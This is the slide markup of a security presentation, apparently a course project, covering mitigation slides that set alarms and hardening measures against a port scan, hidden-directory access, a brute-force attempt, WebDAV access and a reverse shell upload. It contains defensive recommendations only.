                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD9FB307-DBA1-4966-B7D6-FF4C561B0385}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="4800600"/>
            <a:ext cx="20507325" cy="3352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98"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675963" y="4759216"/>
            <a:ext cx="21025800" cy="2193600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182825" tIns="91375" rIns="182825" bIns="91375" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="15000"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="12800"/>
              <a:t>Mitigation</a:t>
            </a:r>
            <a:endParaRPr sz="12800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="15000"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9600" b="0"/>
              <a:t>Hardening the System</a:t>
            </a:r>
            <a:endParaRPr sz="9600"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29"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1430" name="Google Shape;1430;p99"/>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Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1431" name="Google Shape;1431;p99"/>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1432" name="Google Shape;1432;p99"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="1762125"/>
            <a:ext cx="22942800" cy="11382375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To prevent exposing to this type of port scanning we need to set an alarm and mitigate our system: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-508000" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alarm</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-508000" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Usually only scan types that establish full TCP connections are logged, while the default Nmap SYN scan sneaks through. Even full TCP connections are only logged if the port scan occurred. A bunch of error messages at the same time is a common indicator of scanning activity since we have to set an alarm when these huge number of uncompleted TCP error messages appeared in the system log.</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-508000" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Understand what is normal background noise and what actually constitutes a threat. Set up threshold for indications of compromise.</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-508000" algn="just">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System Hardening</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="406400" lvl="0" indent="0" algn="justLow">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Using a firewall to prevent access to ports/services that should not be public. Restrict       access to known IP addresses.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36"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1437" name="Google Shape;1437;p100"/>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Find the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1438" name="Google Shape;1438;p100"/>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1439" name="Google Shape;1439;p100"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="1800225"/>
            <a:ext cx="22942800" cy="11191875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alarm</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-508000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>We could set an alert of any machine trying to access this directory or file from any unauthorized source. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-508000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We may set threshold such as 1 to represent any unauthorized trying of access to the hidden directory to fire the alarm.</a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System Hardening</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-508000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The simplest way to mitigate this malicious access is to remove that file and secret folder from the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4400"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43"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1444" name="Google Shape;1444;p101"/>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Identifying the Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1445" name="Google Shape;1445;p101"/>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1446" name="Google Shape;1446;p101"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="1962149"/>
            <a:ext cx="22942800" cy="10772775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alarm</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-508000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Setting the alert when a machine attempt to access the hidden directory as Brute Force Alert which indicates the number of failed attempts to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-508000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The threshold vary but may 15 attempts per hour to fire the alarm.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System Hardening</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-508000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Setting IPS which drop the failed attempt to access the hidden directory when returned error code 401 or applying locking the user when meet the limit threshold on the failed attempts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="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50"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1451" name="Google Shape;1451;p102"/>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Find the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1452" name="Google Shape;1452;p102"/>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1453" name="Google Shape;1453;p102"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717425" y="1943100"/>
            <a:ext cx="22942800" cy="10391775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alarm</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-508000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We may set alarm of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Any user not authorized to access the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t> will send an email to the SOC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-508000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threshold would be set such as 1 to fire this alarm.</a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System Hardening</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-508000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>We could restrict the access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> from web interface by firewall.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr sz="44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84"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675963" y="4759216"/>
            <a:ext cx="21025800" cy="2193600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182825" tIns="91375" rIns="182825" bIns="91375" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="15000"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="12800"/>
              <a:t>Network Topology</a:t>
            </a:r>
            <a:endParaRPr sz="9600" b="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457"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1458" name="Google Shape;1458;p103"/>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Kibana Analysis: Identify the Reverse Shell Upload</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1459" name="Google Shape;1459;p103"/>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1460" name="Google Shape;1460;p103"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="1924050"/>
            <a:ext cx="22942800" cy="10238050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Alarm</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-508000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>We may set an alert for any .php file that is uploaded to a server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-508000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By setting a threshold such as 1 or 2 to fire the alarm.</a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
